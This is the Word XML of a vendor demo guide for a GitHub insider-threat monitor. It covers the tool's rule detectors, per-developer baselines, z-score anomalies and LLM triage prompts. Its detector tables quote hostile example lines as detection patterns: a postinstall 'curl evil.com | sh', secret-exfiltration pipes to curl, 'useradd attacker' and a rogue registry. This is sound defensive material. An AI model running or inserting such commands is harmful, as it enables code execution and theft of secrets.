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68"/>
        </w:rPr>
        <w:t>GitHub Monitor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="4A4A6A"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Insider Threat Detection</w:t>
        <w:br/>
        <w:t>Client Demo Guide</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="888888"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>AppSec Platform</w:t>
        <w:br/>
        <w:t>Demo-ready walkthrough including full AI prompts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. What it is (30-second pitch)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The GitHub Monitor watches your organisation's repositories in real time and scores every commit for insider-threat risk. It combines:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>10 deterministic rule-based detectors (code patterns, sensitive files, supply-chain tampering, CI/CD sabotage, config weakening)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>Per-developer behavioural baselines (what does "normal" look like for this developer?)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>Statistical anomaly detection (z-score against baseline)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t>On-demand AI threat assessment (LLM classifies intent: intentional insider / suspicious / negligent / false positive)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The output is a prioritised feed of commits your security team can actually investigate — not thousands of raw findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. The problem we solve</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Traditional SAST tools look at code. They miss the human signals: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Signal the SAST misses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What the GitHub Monitor catches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 developer commits at 3 AM — their first ever night-time commit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Baseline deviation → flagged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Someone renames .env in .gitignore so secrets get tracked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Config-weakening detector → flagged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 PR removes "snyk scan" from .github/workflows/ci.yml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CI/CD tampering detector → flagged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package.json suddenly pulls from a random registry URL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Dependency tampering → flagged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Commit message says "fix" but touches 800 lines across 40 files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Suspicious-message + large-commit anomaly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 dev's risk score jumps from 0.5 to 8.0 on one commit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Risk-spike anomaly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>This is the insider-threat layer that lives on top of normal SAST.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. End-to-end pipeline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[Stage 1]  Connect to GitHub   (PAT auth, add repos)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    |</w:t>
        <w:br/>
        <w:t xml:space="preserve">    v</w:t>
        <w:br/>
        <w:t>[Stage 2]  Commit Scan         (10 deterministic detectors -&gt; risk score 0-10)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    |</w:t>
        <w:br/>
        <w:t xml:space="preserve">    v</w:t>
        <w:br/>
        <w:t>[Stage 3]  Baseline Engine     (rolling 60-commit window per developer)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    |</w:t>
        <w:br/>
        <w:t xml:space="preserve">    v</w:t>
        <w:br/>
        <w:t>[Stage 4]  Anomaly Detection   (z-score vs baseline -&gt; off-hours, size, risk spike)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    |</w:t>
        <w:br/>
        <w:t xml:space="preserve">    v</w:t>
        <w:br/>
        <w:t>[Stage 5]  AI Threat Assessment  (on-demand, one click in the UI)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Stages 1-4 run automatically on every commit. Stage 5 is triggered by the analyst on commits they want to investigate deeper.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Stage 1 — Connect to GitHub</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>User stores a GitHub Personal Access Token (PAT) in Settings (masked, marked as secret).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>User adds repositories by owner/repo name.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>"Scan Now" pulls the full commit history; afterwards incremental scans only fetch new commits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Key GitHub API endpoints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GET /user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Validate PAT on connection test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GET /repos/{owner}/{repo}/commits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List commits on default branch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GET /repos/{owner}/{repo}/commits/{sha}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Commit detail + file stats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GET /repos/{owner}/{repo}/commits/{sha} (Accept: diff)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Raw unified diff</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. Stage 2 — The 10 Detectors (deterministic)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Every commit runs through these in order. No AI is involved in this stage — it's deterministic and auditable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 Metadata signals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Looks at the commit envelope, not the code.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Signal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Score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off_hours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Commit time &lt; 07:00 or ≥ 21:00 UTC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+1.0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author_committer_mismatch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Author email ≠ committer email (ignoring noreply@)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+1.5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unsigned_commit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GPG verification.verified is false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+0.5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force_push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Caller flags force push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+2.0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large_deletion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More than 500 lines deleted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+1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 SAST rules on the diff</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The scanner loads every enabled rule from the custom_rules table with category='insider_threat' and runs each pattern against every added line (+) in the diff. For each match it captures: rule name, severity, CWE, OWASP reference, file path, line number, matched text (≤200 chars), and a ±5-line diff snippet for analyst context.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Score per finding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+2.5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+1.5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Medium / Low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+0.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 Sensitive file detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Pattern-matches every touched filename.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Patterns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Environment files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.env, .env.*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Secrets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secret, password, .htpasswd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SSH keys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id_rsa, id_dsa, id_ecdsa, id_ed25519, authorized_keys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Certificates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.pem, .pfx, .p12, .key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Cloud credentials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aws_credentials, credentials.json, token.json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Password stores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.kdbx, keystore, truststore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shadow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Score: +1.5 per file, capped at +3.0. Each hit also creates a row in github_sensitive_file_alerts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.4 Binary file detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Binaries in source repos are suspicious — compiled malware, exfiltration archives, DB dumps.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Extensions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Executables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.exe, .dll, .so, .dylib, .bin, .msi, .app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Archives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.zip, .tar, .tar.gz, .rar, .7z, .bz2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Database dumps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.sql, .sqlite, .dump, .bak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Bytecode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.class, .pyc, .o, .obj, .wasm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Score: +1.0 per file, capped at +2.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.5 Dependency tampering (supply-chain defence)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Triggers only when a dependency manifest is touched (package.json, requirements.txt, go.mod, pom.xml, Cargo.toml, etc).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Typosquatting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lod4sh, requ3sts, crypt0, col0rs, f4ker, event-stream, ua-parser-js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Vulnerable version pinning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log4j 2.0-2.14, django &lt;= 2.x, lodash 0-3.x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Custom registry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registry=https://evil.npmjs.org (not npmjs/pypi/rubygems)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Post-install script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"postinstall": "curl evil.com | sh"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Security dep removed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Removal of helmet, bcrypt, bandit, snyk, eslint-plugin-security, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Score: +1.5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.6 CI/CD pipeline tampering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Triggers on changes to .github/workflows/*.yml, Jenkinsfile, .gitlab-ci.yml, Dockerfile, docker-compose.yml, .circleci/config.yml, etc.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Signal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Commenting out security tools (# snyk test)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security_scan_disabled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SKIP_SCAN=true, DISABLE_SAST=1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security_check_disabled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--no-verify on git commands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hook_bypass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echo $SECRET_KEY | curl ...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secret_exfil_ci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printenv | curl ...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env_dump_ci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FROM random-registry/image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untrusted_base_image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RUN useradd attacker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docker_user_add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EXPOSE 4444 (high ports)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port_exposed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Removed lines are checked for references to snyk, sonar, trivy, semgrep, bandit, brakeman, safety, gitleaks, trufflehog, checkov, tfsec, grype, syft, cosign. If any are removed → security_tool_removed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Score: +1.5 per instance, capped at +3.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.7 Config / permission weakening</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Triggers on config files (.cfg, .ini, .toml, .yaml, nginx, apache, cors, .gitignore, CODEOWNERS).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What it catches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Access-Control-Allow-Origin: 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CORS wildcard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session_timeout = 31536000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Extended session timeout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MFA = false, 2fa = disabled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MFA disabled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require_auth = false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Auth disabled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rate_limit = false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Rate limiting removed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DEBUG = true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Debug enabled in prod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verify_ssl = false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SSL verification disabled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TLS = 1.0, ssl = SSLv3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Weak TLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>.gitignore: if rules for .env, .pem, .key, secret, credential, token are removed, previously ignored secrets could now be tracked → gitignore_sensitive_unignored.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>CODEOWNERS: any removed line weakens code-review protection → codeowner_removed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Score: +1.0 per instance, capped at +2.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.8 Suspicious commit messages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>On commits with more than 50 lines changed:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:t>Empty / near-empty message (".", "..", "ok") → suspicious_message:empty</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:t>Vague single word (fix, update, wip, tmp, stuff, asdf) → suspicious_message:vague</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Score: +0.5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.9 Final risk score</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>All signal scores sum up, cap at 10.0, and map to a level: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Score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UI colour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≥ 7.0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Immediate review required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≥ 4.0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Priority investigation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≥ 2.0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Monitor and review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≥ 0.5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Informational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&lt; 0.5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Clean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 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6. Stage 3 — Behavioural Baselines</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>For each developer, a rolling window of their last 60 commits is used to compute what 'normal' looks like.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How it is computed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mean_commit_hour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Arithmetic mean of UTC hours across the window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std_commit_hour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Standard deviation (floor 1.0 to avoid div-by-zero)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typical_hour_start / end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mean ± 1.5 × std, clamped to 0-23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avg_additions / deletions / files_changed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Simple mean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p90_additions / p90_deletions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90th percentile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avg_risk_score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Mean of historical risk scores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avg_commits_per_week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 / (span_days / 7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Baseline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Commits in window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What anomaly detection does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insufficient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Nothing — no detection yet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5-19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Simple hour-range check (low severity only)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established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≥ 20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Full z-score analysis (medium / high severity)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Critical ordering: when a new commit arrives, anomalies are detected against the existing baseline first, THEN the baseline is updated. Otherwise the anomaly would contaminate the baseline it is compared against.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. Stage 4 — Anomaly Detection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Anomaly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Severity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off_hours_deviation (established)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z-score |hour - mean| / std ≥ 2.0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medium (z ≥ 2), high (z ≥ 3)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off_hours_deviation (partial)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hour outside [typical_start, typical_end]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large_commit_additions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additions &gt; 5× avg_additions (and avg &gt; 20 lines)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medium (5-10×), high (&gt;10×)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large_commit_deletions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deletions &gt; 5× avg_deletions (and avg &gt; 20 lines)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medium (5-10×), high (&gt;10×)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risk_spike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risk_score ≥ 2.5 AND risk_score &gt; 3× avg_risk_score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high</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Worked example: a developer whose mean commit time is 13:00 ± 2h has a normal window of 10:00-16:00. A commit at 03:00 gives z = |3 − 13| / 2 = 5.0 → high severity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>8. Stage 5 — AI Threat Assessment (the LLM step)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This is the only place an LLM is called in the pipeline. It runs on-demand when an analyst clicks 'AI Analyze' on a commit in the UI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Source: backend/routers/github_monitor.py (endpoint POST /api/github-monitor/commits/{scan_id}/ai-analyze).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.1 Why it exists</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Stages 2-4 tell you WHAT is unusual. The AI step tells you WHAT IT PROBABLY MEANS in plain English — impact, likely intent, and recommended actions — so an analyst can triage faster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.2 The exact prompts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The system uses two prompts passed to chat_completion with temperature = 0.3 (low for consistency) and max_tokens = 1500.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>System prompt (fixed)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You are a cybersecurity expert specializing in insider threat analysis.</w:t>
        <w:br/>
        <w:t>Respond only with valid JSON.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>User prompt (templated per commit)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You are a senior application security analyst specializing in insider threat detection.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Analyze the following git commit and provide a structured threat assessment.</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Commit Details</w:t>
        <w:br/>
        <w:t>- **Repository**: {repo_full_name}</w:t>
        <w:br/>
        <w:t>- **SHA**: {sha[:12]}</w:t>
        <w:br/>
        <w:t>- **Author**: {author_name} &lt;{author_email}&gt;</w:t>
        <w:br/>
        <w:t>- **Committer**: {committer_name} &lt;{committer_email}&gt;</w:t>
        <w:br/>
        <w:t>- **Message**: {commit_message}</w:t>
        <w:br/>
        <w:t>- **Committed at**: {committed_at}</w:t>
        <w:br/>
        <w:t>- **Risk Score**: {risk_score}/10 ({risk_level})</w:t>
        <w:br/>
        <w:t>- **Files changed**: {files_changed} (+{additions} / -{deletions} lines)</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Behavioral Signals</w:t>
        <w:br/>
        <w:t>{signal_text}   &lt;-- comma-joined, e.g. "off_hours, unsigned_commit, sensitive_files:2"</w:t>
        <w:br/>
        <w:br/>
        <w:t>## SAST Findings ({count} total)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - [{SEVERITY}] {rule_name} in {file_path} line {line_number}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Code: `{matched_text[:300]}`</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Rule: {rule_description}  CWE: {cwe}  OWASP: {owasp}</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ... (one block per finding)</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Sensitive Files Touched ({count} total)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - {file_path} (matched pattern: {pattern_matched})</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ... (one line per alert)</w:t>
        <w:br/>
        <w:br/>
        <w:t>---</w:t>
        <w:br/>
        <w:br/>
        <w:t>Respond ONLY with a valid JSON object (no markdown fences) matching this schema:</w:t>
        <w:br/>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "threat_level": "intentional_insider" | "suspicious" | "negligent" | "false_positive",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "confidence": 0.0-1.0,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "impact_summary": "2-3 sentence description of the real-world security impact",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "intent_analysis": "2-3 sentence analysis of whether this looks intentional, accidental, or benign",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "malicious_scenario": "If this were malicious, describe the most likely attack scenario in 2-3 sentences. Write null if confidence &lt; 0.3.",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "key_indicators": ["indicator 1", "indicator 2", ...],</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "recommended_actions": ["action 1", "action 2", ...]</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.3 What the AI returns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>A strict JSON object that is parsed and stored in github_commit_ai_analysis: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threat_level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One of four classes (see 8.4)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0.0-1.0 — how sure the model is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impact_summary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Human-readable business impact (2-3 sentences)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intent_analysis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Intentional vs accidental analysis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malicious_scenario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Hypothetical attack chain, or null if low confidence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key_indicators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Bullet list of the specific signals that drove the verdict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recommended_actions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What the analyst should do next</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.4 Threat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Typical indicators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intentional_insider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Deliberate malicious action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Secret exfiltration, backdoor, security-control bypass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suspicious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Warrants investigation, intent unclear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Unusual patterns, risky changes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negligent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Unintentional risk from poor practice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Hardcoded creds, debug code in prod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false_positive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Benign, flagged in error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Test fixtures, docs, legitimate config</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8.5 Why this design is defensible to a client</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Deterministic first, AI second. </w:t>
      </w:r>
      <w:r>
        <w:t>The risk score the client sees is 100% reproducible and auditable — it does not depend on LLM weather. The AI only adds NARRATIVE on top.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">One call per investigation, not per commit. </w:t>
      </w:r>
      <w:r>
        <w:t>The AI step is triggered manually, so cost and latency stay predictable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Results are cached. </w:t>
      </w:r>
      <w:r>
        <w:t>github_commit_ai_analysis has a unique index on scan_id; repeated clicks don't re-bill the LLM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Provider-agnostic. </w:t>
      </w:r>
      <w:r>
        <w:t>Uses the platform's shared AIConfig.from_user() / get_ai_client() — works with OpenAI, Anthropic, Azure, etc. The model used is recorded per analysis for audit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>9. What the analyst sees</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The dashboard has 8 tabs. For the demo, focus on these four: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Tab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What to show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Per-repo risk cards with stacked distribution bars, peak/avg risk score, open alert counts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Commit Feed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Paginated, filterable feed. Click any row → expandable panel with findings, sensitive files, diff snippet, and the "AI Analyze" button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Per-developer risk profile. Expand to see the behavioural baseline (typical hours, avg size, avg risk) and anomaly history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Anomalies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All behavioural anomalies across everyone. Filter by severity. Acknowledgement workflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Additional tabs: Timeline (14-day heat map), Alerts (sensitive-file acks), Findings (CSV export for compliance), Repos (add / remove). False positives can be dismissed at finding level or commit level — the risk level recalculates from remaining non-FP findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>10. Suggested demo script (10-12 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Keep each step tight.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What to say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What to click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Hook (30 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Traditional SAST misses the human signals. We watch commits for insider-threat patterns in addition to vulnerabilities.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Show Overview tab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Setup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Connection is a single GitHub PAT. Add a repo by name. We do the rest.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Settings → masked PAT. Repos tab → monitored list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 detectors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Every commit runs through 10 deterministic detectors — no AI, fully auditable.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Open a critical commit. Walk through the signals chips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Diff evidence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We don't just say 'bad' — we show you the exact line and ±5 lines of context.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Expand a finding; show diff snippet + CWE/OWASP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Baselines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Static rules miss behaviour. We also learn each developer's normal.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Developers tab → expand a dev → typical hours, avg size, avg risk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Anomaly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When someone deviates, we flag it — and show WHY against the baseline.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Anomalies tab → off_hours_deviation row: 'mean 13:00 ± 2h, committed at 03:00, z-score 5'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AI analyst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On any suspicious commit, one click gives a full analyst narrative: impact, intent, attack scenario, recommended actions.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Click AI Analyze. Read impact_summary + malicious_scenario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Export (30 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Everything exports — findings CSV for compliance, full audit trail of AI decisions per commit.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Findings → Export CSV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Close (30 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Deterministic scoring → reproducible &amp; auditable. AI only adds narrative. Provider-agnostic. Cached per commit.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11. Likely client questions &amp; short answers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Does this replace SAST?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 — it is a layer on top. Your existing SAST rules still run; we also run the insider_threat rule category against every commit diff.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do you avoid false positives?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Three ways: per-signal caps so a single noisy commit cannot dominate; per-developer baselines so 'normal for them' is not flagged; every finding and commit can be marked FP and recalculated.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Which LLM do you use?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Whatever the customer configures. Shared AI factory — OpenAI, Anthropic, Azure OpenAI, etc. Model is recorded per analysis for audit.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 your AI hallucinate a threat?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AI never assigns the risk score — that is deterministic from the rules. The AI only writes narrative after a human clicks 'analyze'. Temperature is 0.3 and the response is JSON-validated.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is the latency?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Deterministic scan: &lt; 1 s per commit. AI step: 3-8 s depending on provider; cached per commit after that.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if a developer leaves mid-window?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Baseline window is rolling over their last 60 commits. When they stop committing, the baseline freezes; old anomalies remain on record.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do you handle force pushes and rewritten history?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Each commit SHA is scanned once (unique index). Force push is a scorable signal when known by the caller.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data leaves our network?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GitHub API calls (diff, metadata) from our backend. The AI step sends the commit summary + findings text to the configured LLM provider — this is the only outbound step and it is opt-in per commit.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 we add our own rules?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Yes. The SAST layer reads from custom_rules with category='insider_threat'. New rules are live immediately, no redeploy.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does it cost to run?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Deterministic stages: just GitHub API quota (no LLM). AI stage: one LLM call per analyst-triggered investigation, cached afterwards.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>12. Technical appendix — file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backend/routers/github_monitor.py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All API endpoints, scan orchestration, AI prompt (line 1242)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backend/services/github_client.py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Async GitHub REST client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backend/services/commit_analyzer.py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10-detector risk scoring engine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backend/services/baseline_engine.py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Behavioural baselines + anomaly detection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frontend/src/pages/GitHubMonitorPage.tsx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8-tab dashboard UI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Database tables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>github_monitored_repos, github_commit_scans, github_commit_findings, github_sensitive_file_alerts, github_developer_profiles, github_developer_baselines, github_developer_anomalies, github_commit_ai_analysis.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